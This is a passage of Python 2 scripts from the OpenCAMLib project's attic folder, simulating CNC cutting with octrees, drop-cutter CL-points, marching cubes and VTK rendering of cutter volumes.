#bdc.setThreads(1) # explicitly setting one thread is better for debugging
for p in clpoints:
bdc.appendPoint(p)
t_before = time.time()
bdc.run()
t_after = time.time()
calctime = t_after-t_before
print " BDC4 done in ", calctime," s"
dropcutter_time = calctime
clpoints = bdc.getCLPoints()
#camvtk.drawCLPointCloud(myscreen, clpoints)
print " clpts= ", len(clpoints)
myscreen.render()
#myscreen.iren.Start()
#exit()
s = ocl.BallCutterVolume()
#s = ocl.CylCutterVolume()
#s.center = ocl.Point(-2.50,-0.6,0)
s.radius = cutter.getRadius()
s.length = cutter.getLength()
# screenshot writer
w2if = vtk.vtkWindowToImageFilter()
w2if.SetInput(myscreen.renWin)
lwr = vtk.vtkPNGWriter()
lwr.SetInput( w2if.GetOutput() )
cp= ocl.Point(5,5,-3) # center of octree
#depths = [3, 4, 5, 6, 7, 8]
max_depth = 7
root_scale = 7
t = ocl.Octree(root_scale, max_depth, cp)
t.init(5)
n = 0 # the frame number
stockbox = ocl.PlaneVolume( 1, 0, 0.1)
t.diff_negative(stockbox)
stockbox = ocl.PlaneVolume( 0, 0, 8.9 )
t.diff_negative(stockbox)
stockbox = ocl.PlaneVolume( 1, 1, 0.1)
t.diff_negative(stockbox)
stockbox = ocl.PlaneVolume( 0, 1, 11.9 )
t.diff_negative(stockbox)
stockbox = ocl.PlaneVolume( 1, 2, -0.5 )
t.diff_negative(stockbox)
stockbox = ocl.PlaneVolume( 0, 2, 3)
t.diff_negative(stockbox)
mc = ocl.MarchingCubes()
print "mc()...",
tris = mc.mc_tree(t) #.mc_triangles()
print " mc() got ", len(tris), " triangles"
mc_surf = camvtk.STLSurf( triangleList=tris, color=camvtk.red )
mc_surf.SetColor(camvtk.cyan)
print " STLSurf()...",
myscreen.addActor( mc_surf )
print "done."
cl = ocl.Point(0,0,5)
cactors = camvtk.drawBallCutter(myscreen, cutter, cl)
myscreen.render()
#myscreen.iren.Start()
#exit()
myscreen.removeActor( mc_surf )
renderinterleave=len(clpoints)/100
step_time = 0
#render_time = 0
while (n<len(clpoints)):
cl = ocl.Point( clpoints[n].x, clpoints[n].y, clpoints[n].z )
s.setPos( cl ) # move the cutter
t_before = time.time()
t.diff_negative(s) # subtract cutter from stock
t_after = time.time()
build_time = t_after-t_before
step_time=step_time+build_time
n=n+1
if n<(len(clpoints)-renderinterleave):
myscreen.removeActor( mc_surf )
for c in cactors:
myscreen.removeActor( c )
if ( (n%renderinterleave)==0):
cactors = camvtk.drawBallCutter(myscreen, cutter, cl)
t_before = time.time()
print "mc()...",
tris = mc.mc_tree(t) #.mc_triangles()
mc_time = time.time()-t_before
print "done in ", mc_time," s"
print " mc() got ", len(tris), " triangles"
print " STLSurf()...",
t_before = time.time()
mc_surf = camvtk.STLSurf( triangleList=tris, color=camvtk.red )
#mc_surf.SetWireframe()
mc_surf.SetColor(camvtk.cyan)
myscreen.addActor( mc_surf )
print "done."
print " render()...",
myscreen.render()
render_time = time.time()-t_before
myscreen.camera.Azimuth( 0.1 )
lwr.SetFileName("frames/cutsim_d10_frame"+ ('%06d' % n)+".png")
w2if.Modified()
call_ms = step_time/renderinterleave
print renderinterleave," diff() calls in", step_time, " = ", call_ms," ms/call"
infotext= "Octree max_depth=%i \nCL-point %i of %i \n%i CL-pts/frame\ndiff()-time: %1.3f s/CL-point\nmc()-time: %1.3f s/frame\nrender()-time: %1.3f s/frame\n%i Triangles" % (max_depth,n,
len(clpoints), renderinterleave, call_ms, mc_time, render_time, len(tris))
octtext.SetText(infotext)
postext= "X: %f\nY: %f\nZ: %f" % (cl.x,cl.y,cl.z )
cltext.SetText(postext)
#lwr.Write() # uncomment to actually write files to disk
print "done."
step_time = 0
#lwr.SetFileName("frames/mc8_frame"+ ('%06d' % n)+".png")
#myscreen.camera.Azimuth( 2 )
#myscreen.render()
#w2if.Modified()
#lwr.Write()
#mc_surf.SetWireframe()
#print "sleep...",
#time.sleep(1.02)
#print "done."
print " clpts= ", len(clpoints)
print "All done."
myscreen.iren.Start()
if __name__ == "__main__":
main()
```
#### File: attic/ocode/cutsim_test_2.py
```python
import ocl
import pyocl
import camvtk
import time
import datetime
import vtk
def main(filename="frame/f.png"):
print ocl.revision()
myscreen = camvtk.VTKScreen()
myscreen.camera.SetPosition(-15, -8, 15)
myscreen.camera.SetFocalPoint(5,5, 0)
# axis arrows
camvtk.drawArrows(myscreen,center=(-1,-1,0))
# screenshot writer
w2if = vtk.vtkWindowToImageFilter()
w2if.SetInput(myscreen.renWin)
lwr = vtk.vtkPNGWriter()
lwr.SetInput( w2if.GetOutput() )
c = ocl.CylCutter(2) # cutter
c.length = 3
print "cutter length=", c.length
# generate CL-points
stl = camvtk.STLSurf("../stl/demo.stl")
polydata = stl.src.GetOutput()
s = ocl.STLSurf()
camvtk.vtkPolyData2OCLSTL(polydata, s)
print "STL surface read,", s.size(), "triangles"
print s.getBounds()
#exit()
minx=0
dx=0.1/6
maxx=10
miny=0
dy=1
maxy=10
z=-17
# this generates a list of CL-points in a grid
clpoints = pyocl.CLPointGridZigZag(minx,dx,maxx,miny,dy,maxy,z)
print "generated grid with", len(clpoints)," CL-points"
# batchdropcutter
bdc = ocl.BatchDropCutter()
bdc.setSTL(s,1)
bdc.setCutter(c)
for p in clpoints:
bdc.appendPoint(p)
t_before = time.time()
print "threads=",bdc.nthreads
bdc.dropCutter4()
t_after = time.time()
calctime = t_after-t_before
print " done in ", calctime," s"
clpoints = bdc.getCLPoints()
# filter
print "filtering. before filter we have", len(clpoints),"cl-points"
f = ocl.LineCLFilter()
f.setTolerance(0.001)
for p in clpoints:
f.addCLPoint(p)
f.run()
clpts = f.getCLPoints()
print "after filtering we have", len(clpts),"cl-points"
#exit()
# stupid init code
f=ocl.Ocode()
tree_maxdepth=8
f.set_depth(tree_maxdepth) # depth and scale set here.
f.set_scale(10)
# cube
stockvol = ocl.BoxOCTVolume()
stockvol.corner = ocl.Point(0,0,-0.5)
stockvol.v1 = ocl.Point(10,0,0)
stockvol.v2 = ocl.Point(0,10,0)
stockvol.v3 = ocl.Point(0,0,3)
stockvol.calcBB()
#cube1.side=10.0
#cube1.center = ocl.Point(0,0,0)
#cube1.calcBB()
t_before = time.time()
stock = ocl.LinOCT()
stock.init(3)
stock.build( stockvol )
calctime = time.time()-t_before
print " stock built in ", calctime," s, stock.size()=",stock.size()
# draw initial octree
#tlist = pyocl.octree2trilist(stock)
#surf = camvtk.STLSurf(triangleList=tlist)
#myscreen.addActor(surf)
# draw initial cutter
#startp = ocl.Point(0,0,0)
#cyl = camvtk.Cylinder(center=(startp.x,startp.y,startp.z), radius=c.radius,
# height=c.length,
# rotXYZ=(90,0,0), color=camvtk.grey)
#cyl.SetWireframe()
#myscreen.addActor(cyl)
timetext = camvtk.Text()
timetext.SetPos( (myscreen.width-300, myscreen.height-30) )
myscreen.addActor( timetext)
ocltext = camvtk.Text()
ocltext.SetPos( (myscreen.width-300, myscreen.height-60) )
myscreen.addActor( ocltext)
ocltext.SetText("OpenCAMLib")
octtext = camvtk.Text()
octtext.SetPos( (myscreen.width-300, myscreen.height-90) )
myscreen.addActor( octtext)
octtext.SetText("Octree cutting-simulation")
infotext = camvtk.Text()
infotext.SetPos( (myscreen.width-300, myscreen.height-180) )
myscreen.addActor( infotext)
Nmoves = len(clpts)
print Nmoves,"CL-points to process"
for n in xrange(0,Nmoves-1):
timetext.SetText(datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"))
#if n<Nmoves-1:
print n," to ",n+1
startp = clpts[n] # start of move
endp = clpts[n+1] # end of move
t_before = time.time()
sweep = ocl.LinOCT()
sweep.init(0)
calctime = time.time()-t_before
print " sweep-init done in ", calctime," s, sweep.size()=",sweep.size()
g1vol = ocl.CylMoveOCTVolume(c, ocl.Point(startp.x,startp.y,startp.z), ocl.Point(endp.x,endp.y,endp.z))
t_before = time.time()
sweep.build( g1vol )
calctime = time.time()-t_before
print " sweep-build done in ", calctime," s, sweep.size()=",sweep.size()
# draw cutter
cyl1 = camvtk.Cylinder(center=(startp.x,startp.y,startp.z), radius=c.radius,
height=c.length,
rotXYZ=(90,0,0), color=camvtk.lgreen)
cyl1.SetWireframe()
#myscreen.addActor(cyl1)
cyl2 = camvtk.Cylinder(center=(endp.x,endp.y,endp.z), radius=c.radius,
height=c.length,
rotXYZ=(90,0,0), color=camvtk.pink)
cyl2.SetWireframe()
#myscreen.addActor(cyl2)
#camvtk.drawCylCutter(myscreen, c, startp)
#camvtk.drawCylCutter(myscreen, c, endp)
myscreen.addActor( camvtk.Line( p1=(startp.x,startp.y,startp.z), p2=(endp.x,endp.y,endp.z), color=camvtk.red))
#camvtk.drawTree2(myscreen,sweep,color=camvtk.red,opacity=0.5)
t_before = time.time()
stock.diff(sweep)
calctime = time.time()-t_before
print " diff done in ", calctime," s, stock.size()", stock.size()
info = "tree-depth:%i \nmove: %i \nstock-nodes: %i \nsweep-nodes: %i" % (tree_maxdepth, n, stock.size(), sweep.size() )
infotext.SetText(info)
if (n%1==0 or n==Nmoves-2): # draw only every m:th frame
# sweep surface
t_before = time.time()
#sweep_tlist = pyocl.octree2trilist(sweep)
sweep_tlist = sweep.get_triangles()
sweepsurf = camvtk.STLSurf(triangleList=sweep_tlist)
sweepsurf.SetColor(camvtk.red)
sweepsurf.SetOpacity(0.1)
myscreen.addActor(sweepsurf)
calctime = time.time()-t_before
print " sweepsurf-render ", calctime," s"
# stock surface
t_before = time.time()
#tlist = pyocl.octree2trilist(stock)
tlist = stock.get_triangles()
stocksurf = camvtk.STLSurf(triangleList=tlist)
stocksurf.SetColor(camvtk.cyan)
stocksurf.SetOpacity(1.0)
myscreen.addActor(stocksurf)
calctime = time.time()-t_before
print " stocksurf-render ", calctime," s"
#time.sleep(1.1)
# write screenshot to disk
lwr.SetFileName("frames/cutsim_frame"+ ('%03d' % n)+".png")
#lwr.SetFileName(filename)
t_before = time.time() # time the render process
myscreen.render()
w2if.Modified()
lwr.Write()
calctime = time.time()-t_before
print " render ", calctime," s"
#myscreen.render()
#time.sleep(0.1)
myscreen.removeActor(sweepsurf)
if n != (Nmoves-2):
myscreen.removeActor(stocksurf)
#myscreen.removeActor(cyl1)
#myscreen.removeActor(cyl2)
#myscreen.render()
#time.sleep(0.1)
print " render()...",
myscreen.render()
print "done."
#time.sleep(0.2)
myscreen.iren.Start()
if __name__ == "__main__":
main()
```
#### File: attic/ocode/ocode_cylcutter_volume_2.py
```python
import ocl
import camvtk
import time
import datetime
import vtk
def drawTree(myscreen,t,color=camvtk.red,opacity=0.2, offset=(0,0,0)):
nodes = t.get_nodes()
black=0
nmax=len(nodes)
i=0
for n in nodes:
cen = n.point()
#print "cen=",cen.str()
scale = n.get_scale()
#print "col=", n.color
if n.color == 0:
#print "found white node!"
#color = camvtk.red
cube = camvtk.Cube(center=(cen.x+offset[0], cen.y+offset[1], cen.z+offset[2]), length= scale, color=color)
cube.SetOpacity(opacity)
#cube.SetPhong()
cube.SetGouraud()
#cube.SetWireframe()
myscreen.addActor( cube )
black = black+1
if n.color == 1:
#print "found white node!"6
color = camvtk.blue
cube = camvtk.Cube(center=(cen.x, cen.y, cen.z), length= scale, color=color)
cube.SetOpacity(opacity)
myscreen.addActor( cube )
#black = black+1
if ( (i % (nmax/10))==0):
print ".",
i=i+1
print "done."
#print black," black nodes"
"""
for m in xrange(0,9):
cen = n.corner(m)
sph = camvtk.Sphere( center=(cen.x, cen.y, cen.z), radius=0.5, color=camvtk.green)
myscreen.addActor(sph)
"""
#myscreen.render()
#raw_input("Press Enter to terminate")
def main(filename="frame/f.png",yc=6, n=0):
f=ocl.Ocode()
f.set_depth(10)
myscreen = camvtk.VTKScreen()
myscreen.camera.SetPosition(50, 22, 40)
myscreen.camera.SetFocalPoint(0,0, 0)
myscreen.camera.Azimuth( n*0.5 )
# box around octree
oct_cube = camvtk.Cube(center=(0,0,0), length=40, color=camvtk.white)
oct_cube.SetWireframe()
myscreen.addActor(oct_cube)
# screenshot writer
w2if = vtk.vtkWindowToImageFilter()
w2if.SetInput(myscreen.renWin)
lwr = vtk.vtkPNGWriter()
lwr.SetInput( w2if.GetOutput() )
arrowcenter=(1,2,0)
xar = camvtk.Arrow(color=camvtk.red, center=arrowcenter, rotXYZ=(0,0,0))
myscreen.addActor(xar)
yar = camvtk.Arrow(color=camvtk.green, center=arrowcenter, rotXYZ=(0,0,90))
myscreen.addActor(yar)
zar = camvtk.Arrow(color=camvtk.blue, center=arrowcenter, rotXYZ=(0,-90,0))
myscreen.addActor(zar)
t = ocl.LinOCT()
#t2 = ocl.LinOCT()
t.init(3)
#t2.init(3)
print " after init() t :", t.str()
#print " after init() t2 :", t2.str()
# sphere
svol = ocl.SphereOCTVolume()
svol.radius=3.2
svol.center = ocl.Point(1,0,3)
# cube
cube1 = ocl.CubeOCTVolume()
cube1.side=69
cube1.center = ocl.Point(0,0,0)
#cylinder
cylvol = ocl.CylinderOCTVolume()
cylvol.p2 = ocl.Point(0,0,4)
cylvol.radius= 4
c = ocl.CylCutter(1)
c.length = 3
print "cutter length=", c.length
p1 = ocl.Point(0,0,0)
p2 = ocl.Point(1,1.4,0)
g1vol = ocl.CylMoveOCTVolume(c, p1, p2)
cyl1 = camvtk.Cylinder(center=(p1.x,p1.y,p1.z), radius=c.radius,
height=c.length,
rotXYZ=(90,0,0), color=camvtk.grey)
cyl1.SetWireframe()
myscreen.addActor(cyl1)
cyl2 = camvtk.Cylinder(center=(p2.x,p2.y,p2.z), radius=c.radius,
height=c.length,
rotXYZ=(90,0,0), color=camvtk.grey)
cyl2.SetWireframe()
myscreen.addActor(cyl2)
startp = camvtk.Sphere(center=(p1.x,p1.y,p1.z), radius=0.1, color=camvtk.green)
myscreen.addActor(startp)
endp = camvtk.Sphere(center=(p2.x,p2.y,p2.z), radius=0.1, color=camvtk.red)
myscreen.addActor(endp)
t.build(g1vol )
#print "t2 build()"
#t2.build(cube1)
#print " t2 after build() ", t2.size()
#t2.condense()
#print " t2 after condense() ", t2.size()
# original trees
drawTree(myscreen,t,opacity=1, color=camvtk.green)
#drawTree(myscreen,t2,opacity=1, color=camvtk.red)
#print " diff12()...",
#t3 = t2.operation(1,t)
#print "done."
#print " diff21()...",
#t4 = t2.operation(2,t)
#print "done."
#print " intersection()...",
#t5 = t2.operation(3,t)
#print "done."
#print " sum()...",
#t6 = t2.operation(4,t)
#print "done."
#print " difference 1-2 t3 (blue) =", t3.size()
#print " difference 2-1 t4 (yellow)=", t4.size()
#print " intersection t5 (pink) =", t5.size()
#print " union t6 (grey) =", t6.size()
#drawTree(myscreen,t3,opacity=1, color=camvtk.blue, offset=(0,15,0))
#drawTree(myscreen,t4,opacity=1, color=camvtk.yellow,offset=(0,-15,0))
#drawTree(myscreen,t5,opacity=1, color=camvtk.pink,offset=(-15,0,0))
#drawTree(myscreen,t6,opacity=1, color=camvtk.grey,offset=(-15,-15,0))
title = camvtk.Text()
title.SetPos( (myscreen.width-350, myscreen.height-30) )
title.SetText("OpenCAMLib " + datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"))
myscreen.addActor(title)
#st2 = camvtk.Text()
#ytext = "Linear OCTree set operations: difference, intersection, union"
#st2.SetText(ytext)
#st2.SetPos( (50, myscreen.height-30) )
#myscreen.addActor( st2)
#st3 = camvtk.Text()
#text = "Original OCTrees\n Ball:%d nodes\n Cube: %d nodes" % ( t.size(), t2.size() )
#st3.SetText(text)
#st3.SetPos( (50, 200) )
#myscreen.addActor( st3)
#st4 = camvtk.Text()
#un = " Union (grey): %d nodes\n" % (t6.size())
#int = " Intersection (pink): %d nodes\n" % (t5.size())
#diff1 = " difference Cube-Ball (blue): %d nodes\n" % (t3.size())
#diff2 = " difference Ball-Cube (yellow): %d nodes\n" % (t4.size())
#text= un+int+diff1+diff2
#st4.SetText(text)
#st4.SetPos( (50, 100) )
#myscreen.addActor( st4)
myscreen.render()
lwr.SetFileName(filename)
time.sleep(0.2)
#lwr.Write()
myscreen.iren.Start()
if __name__ == "__main__":
#Nsteps = 720
#ystart = 6
#ystop = -6
#ystep = float(ystop-ystart)/(Nsteps-1)
main()
#fiangle = fiangle + 2
```
#### File: attic/ocode/ocode_cylcutter_volume.py
```python
import ocl
import camvtk
import time
import datetime
import vtk
def drawTree(myscreen,t,color=camvtk.red,opacity=0.2, offset=(0,0,0)):
nodes = t.get_nodes()
nmax=len(nodes)
i=0
for n in nodes:
cen = n.point()
#print "cen=",cen.str()
scale = n.get_scale()
#print "col=", n.color
cube = camvtk.Cube(center=(cen.x+offset[0], cen.y+offset[1], cen.z+offset[2]), length= scale, color=color)
cube.SetOpacity(opacity)
#cube.SetPhong()
cube.SetGouraud()
#cube.SetWireframe()
myscreen.addActor( cube )
if ( (i % (nmax/10))==0):
print ".",
i=i+1
print "done."
def drawTree2(myscreen,t,color=camvtk.red,opacity=0.2, offset=(0,0,0)):
nodes = t.get_nodes()
nmax=len(nodes)
print "drawTree2: ", nmax," nodes",
# make a list of triangles
tlist = []
i=0
for n in nodes:
p1 = n.corner(0) # + + +
p2 = n.corner(1) # - + +
p3 = n.corner(2) # + - +
p4 = n.corner(3) # + + -
p5 = n.corner(4) # + - -
p6 = n.corner(5) # - + -
p7 = n.corner(6) # - - +
p8 = n.corner(7) # - - -
tlist.append(ocl.Triangle(p1,p2,p3)) #top
tlist.append(ocl.Triangle(p2,p3,p7)) #top
tlist.append(ocl.Triangle(p4,p5,p6)) # bot
tlist.append(ocl.Triangle(p5,p6,p8)) # bot
tlist.append(ocl.Triangle(p1,p3,p4)) # 1,3,4,5
tlist.append(ocl.Triangle(p4,p5,p3))
tlist.append(ocl.Triangle(p2,p6,p7)) # 2,6,7,8
tlist.append(ocl.Triangle(p7,p8,p6))
tlist.append(ocl.Triangle(p3,p5,p7)) # 3,5,7,8
tlist.append(ocl.Triangle(p7,p8,p5))
tlist.append(ocl.Triangle(p1,p2,p4)) # 1,2,4,6
tlist.append(ocl.Triangle(p4,p6,p2))
if ( (i % (nmax/10))==0):
print ".",
i=i+1
#tlist.append(ocl.Triangle(p1,p2,p4))
#tlist.append(ocl.Triangle(p1,p3,p5))
#tlist.append(ocl.Triangle(p2,p3,p7))
#tlist.append(ocl.Triangle(p2,p7,p8))
#tlist.append(ocl.Triangle(p3,p7,p8))
print "done"
surf = camvtk.STLSurf(triangleList=tlist)
surf.SetColor(color)
surf.SetOpacity(opacity)
myscreen.addActor(surf)
def drawBB( myscreen, vol ):
lines = []
lines.append( camvtk.Line(p1=(vol.bb.minx, vol.bb.miny, vol.bb.minz) , p2=(vol.bb.maxx, vol.bb.miny, vol.bb.minz)) )
lines.append( camvtk.Line(p1=(vol.bb.minx, vol.bb.maxy, vol.bb.minz) , p2=(vol.bb.maxx, vol.bb.maxy, vol.bb.minz)) )
lines.append( camvtk.Line(p1=(vol.bb.minx, vol.bb.maxy, vol.bb.maxz) , p2=(vol.bb.maxx, vol.bb.maxy, vol.bb.maxz)) )
lines.append( camvtk.Line(p1=(vol.bb.minx, vol.bb.miny, vol.bb.maxz) , p2=(vol.bb.maxx, vol.bb.miny, vol.bb.maxz)) )
lines.append( camvtk.Line(p1=(vol.bb.minx, vol.bb.miny, vol.bb.minz) , p2=(vol.bb.minx, vol.bb.miny, vol.bb.maxz)) )
lines.append( camvtk.Line(p1=(vol.bb.maxx, vol.bb.miny, vol.bb.minz) , p2=(vol.bb.maxx, vol.bb.miny, vol.bb.maxz)) )
lines.append( camvtk.Line(p1=(vol.bb.minx, vol.bb.maxy, vol.bb.minz) , p2=(vol.bb.minx, vol.bb.maxy, vol.bb.maxz)) )
lines.append( camvtk.Line(p1=(vol.bb.maxx, vol.bb.maxy, vol.bb.minz) , p2=(vol.bb.maxx, vol.bb.maxy, vol.bb.maxz)) )
lines.append( camvtk.Line(p1=(vol.bb.minx, vol.bb.miny, vol.bb.minz) , p2=(vol.bb.minx, vol.bb.maxy, vol.bb.minz)) )
lines.append( camvtk.Line(p1=(vol.bb.maxx, vol.bb.miny, vol.bb.minz) , p2=(vol.bb.maxx, vol.bb.maxy, vol.bb.minz)) )
lines.append( camvtk.Line(p1=(vol.bb.minx, vol.bb.miny, vol.bb.maxz) , p2=(vol.bb.minx, vol.bb.maxy, vol.bb.maxz)) )
lines.append( camvtk.Line(p1=(vol.bb.maxx, vol.bb.miny, vol.bb.maxz) , p2=(vol.bb.maxx, vol.bb.maxy, vol.bb.maxz)) )
for l in lines:
myscreen.addActor(l)
def main(filename="frame/f.png",yc=6, n=0):
f=ocl.Ocode()
f.set_depth(9)
f.set_scale(5)
myscreen = camvtk.VTKScreen()
myscreen.camera.SetPosition(50, 22, 40)
myscreen.camera.SetFocalPoint(0,0, 0)
myscreen.camera.Azimuth( n*0.5 )
# box around octree
oct_cube = camvtk.Cube(center=(0,0,0), length=4*f.get_scale(), color=camvtk.white)
oct_cube.SetWireframe()
myscreen.addActor(oct_cube)
# screenshot writer
w2if = vtk.vtkWindowToImageFilter()
w2if.SetInput(myscreen.renWin)
lwr = vtk.vtkPNGWriter()
lwr.SetInput( w2if.GetOutput() )
arrowcenter=(1,2,0)
xar = camvtk.Arrow(color=camvtk.red, center=arrowcenter, rotXYZ=(0,0,0))
myscreen.addActor(xar)
yar = camvtk.Arrow(color=camvtk.green, center=arrowcenter, rotXYZ=(0,0,90))
myscreen.addActor(yar)
zar = camvtk.Arrow(color=camvtk.blue, center=arrowcenter, rotXYZ=(0,-90,0))
myscreen.addActor(zar)
"""
dl = myscreen.GetLights()
print "original default light:"
print dl
print "nextitem()"
l1 = dl.GetNextItem()
print " light:"
print l1
#print myscreen.GetLights()
lights = vtk.vtkLightCollection()
l = myscreen.MakeLight()
l2 = myscreen.MakeLight()
#myscreen.RemoveAllLights()
l.SetAmbientColor(0.5, 0.5, 0.5)
l.SetPosition(0,0,20)
l.SetConeAngle(360)
l2.SetPosition(0,0,-20)
l2.SetConeAngle(360)
l2.SetIntensity(0.5)
myscreen.AddLight(l)
myscreen.AddLight(l2)
#myscreen.SetLightCollection(lights)
llist = myscreen.GetLights()
li = llist.GetNextItem()
print " new list of lights:"
print li
#for li in llist:
# print li
print " newly created light:"
print l
dl = myscreen.GetLights()
print "NEW light:"
print dl
"""
t = ocl.LinOCT()
t2 = ocl.LinOCT()
t.init(0)
t2.init(1)
#drawTree2(myscreen, t, opacity=0.2)
#myscreen.render()
#myscreen.iren.Start()
#exit()
print " after init() t :", t.str()
print " after init() t2 :", t2.str()
# sphere
svol = ocl.SphereOCTVolume()
svol.radius=3.2
svol.center = ocl.Point(1,0,3)
svol.calcBB()
# cube
cube1 = ocl.CubeOCTVolume()
cube1.side=2.123
cube1.center = ocl.Point(0,0,0)
cube1.calcBB()
#cylinder
cylvol = ocl.CylinderOCTVolume()
cylvol.p2 = ocl.Point(3,4,-5)
cylvol.radius= 2
cylvol.calcBB()
# draw exact cylinder
cp = 0.5*(cylvol.p1 + cylvol.p2)
height = (cylvol.p2-cylvol.p1).norm()
cylvolactor = camvtk.Cylinder(center=(cp.x, cp.y, cp.z-float(height)/2), radius = cylvol.radius, height=height, rotXYZ=(90,0,0))
cylvolactor.SetWireframe()
#myscreen.addActor(cylvolactor)
c = ocl.CylCutter(2)
c.length = 3
print "cutter length=", c.length
p1 = ocl.Point(-1,-2,0)
p2 = ocl.Point(1,2.0,0)
g1vol = ocl.CylMoveOCTVolume(c, p1, p2)
cyl1 = camvtk.Cylinder(center=(p1.x,p1.y,p1.z), radius=c.radius,
height=c.length,
rotXYZ=(90,0,0), color=camvtk.grey)
cyl1.SetWireframe()
myscreen.addActor(cyl1)
cyl2 = camvtk.Cylinder(center=(p2.x,p2.y,p2.z), radius=c.radius,
height=c.length,
rotXYZ=(90,0,0), color=camvtk.grey)
cyl2.SetWireframe()
myscreen.addActor(cyl2)
startp = camvtk.Sphere(center=(p1.x,p1.y,p1.z), radius=0.1, color=camvtk.green)
myscreen.addActor(startp)
endp = camvtk.Sphere(center=(p2.x,p2.y,p2.z), radius=0.1, color=camvtk.red)
myscreen.addActor(endp)
t.build( g1vol )
t2.build( cube1)
print "calling diff()...",
dt = t2.operation(1,t)
print "done."
# set Cylinde bounding-box
"""
cylvol.bb.maxx = 1.23
cylvol.bb.minx = -0.2
cylvol.bb.maxy = 1.23
cylvol.bb.miny = -0.2
cylvol.bb.maxz = 1.23
cylvol.bb.minz = -0.2
"""
drawBB( myscreen, g1vol)
#print cylvol.bb.maxx
#print "t2 build()"
#t2.build(cube1)
#print " t2 after build() ", t2.size()
#t2.condense()
#print " t2 after condense() ", t2.size()
# original trees
drawTree2(myscreen,t,opacity=1, color=camvtk.green)
drawTree2(myscreen,t2,opacity=1, color=camvtk.cyan)
drawTree2(myscreen,dt,opacity=1, color=camvtk.cyan, offset=(5,0,0))
"""
for n in xrange(0,30):
tp = ocl.Point(2.5,2.5,2-n*0.3)
tpc = camvtk.black
if (cylvol.isInside(tp)):
tpc = camvtk.red
else:
tpc = camvtk.cyan
tp_sphere = camvtk.Sphere(center=(tp.x,tp.y,tp.z), radius=0.1, color= tpc)
myscreen.addActor(tp_sphere)
"""
#drawTree(myscreen,t2,opacity=1, color=camvtk.red)
#print " diff12()...",
#t3 = t2.operation(1,t)
#print "done."
#print " diff21()...",
#t4 = t2.operation(2,t)
#print "done."
#print " intersection()...",
#t5 = t2.operation(3,t)
#print "done."
#print " sum()...",
#t6 = t2.operation(4,t)
#print "done."
#print " difference 1-2 t3 (blue) =", t3.size()
#print " difference 2-1 t4 (yellow)=", t4.size()
#print " intersection t5 (pink) =", t5.size()
#print " union t6 (grey) =", t6.size()
#drawTree(myscreen,t3,opacity=1, color=camvtk.blue, offset=(0,15,0))
#drawTree(myscreen,t4,opacity=1, color=camvtk.yellow,offset=(0,-15,0))
#drawTree(myscreen,t5,opacity=1, color=camvtk.pink,offset=(-15,0,0))
#drawTree(myscreen,t6,opacity=1, color=camvtk.grey,offset=(-15,-15,0))
title = camvtk.Text()
title.SetPos( (myscreen.width-350, myscreen.height-30) )
title.SetText("OpenCAMLib " + datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"))
myscreen.addActor(title)
#st2 = camvtk.Text()
#ytext = "Linear OCTree set operations: difference, intersection, union"
#st2.SetText(ytext)
#st2.SetPos( (50, myscreen.height-30) )
#myscreen.addActor( st2)
#st3 = camvtk.Text()
#text = "Original OCTrees\n Ball:%d nodes\n Cube: %d nodes" % ( t.size(), t2.size() )
#st3.SetText(text)
#st3.SetPos( (50, 200) )
#myscreen.addActor( st3)
#st4 = camvtk.Text()
#un = " Union (grey): %d nodes\n" % (t6.size())
#int = " Intersection (pink): %d nodes\n" % (t5.size())
#diff1 = " difference Cube-Ball (blue): %d nodes\n" % (t3.size())
#diff2 = " difference Ball-Cube (yellow): %d nodes\n" % (t4.size())
#text= un+int+diff1+diff2
#st4.SetText(text)
#st4.SetPos( (50, 100) )
#myscreen.addActor( st4)
print " render()...",
myscreen.render()
print "done."
lwr.SetFileName(filename)
time.sleep(0.2)
#lwr.Write()
myscreen.iren.Start()
if __name__ == "__main__":
#Nsteps = 720
#ystart = 6
#ystop = -6
#ystep = float(ystop-ystart)/(Nsteps-1)
main()
#fiangle = fiangle + 2
```
#### File: src/attic/oct_test3.py
```python
import ocl as cam
import camvtk
import time
import vtk
import math
import datetime
red= (1,0,0)
green= (0,1,0)
blue= (0,0,1)
cyan= (0,1,1)
yellow= (1,1,0)
pink = ( float(255)/255,float(192)/255,float(203)/255)
grey = ( float(127)/255,float(127)/255,float(127)/255)
orange = ( float(255)/255,float(165)/255,float(0)/255)
#OCType = Enum('black', 'grey', 'white')
OCTMax = 8
def buildOCTree(volume, nodecenter=cam.Point(0,0,0), level=0):
# build octree of volume, return root node
node = OCTNode( level, center = nodecenter , type = 1, childlist=None)
flags = []
for n in xrange(0,9): # test all points
flags.append( volume.isInside( node.nodePoint(n) ) )
if (sum(flags) == 0): # nothing is inside
node.type = 0
#print "nothing inside!"
return node
if (sum(flags) == 9): # everything is inside
node.type = 2
#print "all inside!"
return node
if level== OCTMax: # reached max levels
return node #OCTNode(level, center= nodecenter, type = 2, childlist = None)
# have to subdivide:
childs = []
child_centers = []
for n in xrange(1,9):
child_center = node.childCenter(n)
childs.append( buildOCTree( volume , nodecenter = child_center, level= level+1) )
node.setChildren(childs)
return node
def searchOCTree(node, list):
# return list of nodes in the whole tree starting at node
if node.children is not None:
for chi in node.children:
searchOCTree(chi, list)
else:
list.append(node)
class Volume():
def __init__(self):
self.center = cam.Point(0,0,0)
self.radius = 0.45
def isInside(self, point):
p = point - self.center
if p.norm() < self.radius:
return 1
else:
return 0
def nodeColor(oct):
offset = 2
n = oct.level-offset
return (float(n)/(OCTMax-offset), float(OCTMax-offset - n)/(OCTMax-offset), 0)
def drawNode(myscreen, node):
if node.type == cam.OCType.BLACK:
return # don't draw intermediate nodes
if node.type == cam.OCType.GREY:
return # don't draw intermediate nodes
p = []
for n in xrange(1,9):
p1 = node.nodePoint(n)
p.append(p1)
lines = []
lines.append ( camvtk.Line(p1=(p[0].x,p[0].y,p[0].z),p2=(p[1].x,p[1].y,p[1].z)) )
lines.append ( camvtk.Line(p1=(p[0].x,p[0].y,p[0].z),p2=(p[2].x,p[2].y,p[2].z)) )
lines.append ( camvtk.Line(p1=(p[0].x,p[0].y,p[0].z),p2=(p[3].x,p[3].y,p[3].z)) )
lines.append ( camvtk.Line(p1=(p[2].x,p[2].y,p[2].z),p2=(p[4].x,p[4].y,p[4].z)) )
lines.append ( camvtk.Line(p1=(p[1].x,p[1].y,p[1].z),p2=(p[5].x,p[5].y,p[5].z)) )
lines.append ( camvtk.Line(p1=(p[1].x,p[1].y,p[1].z),p2=(p[6].x,p[6].y,p[6].z)) )
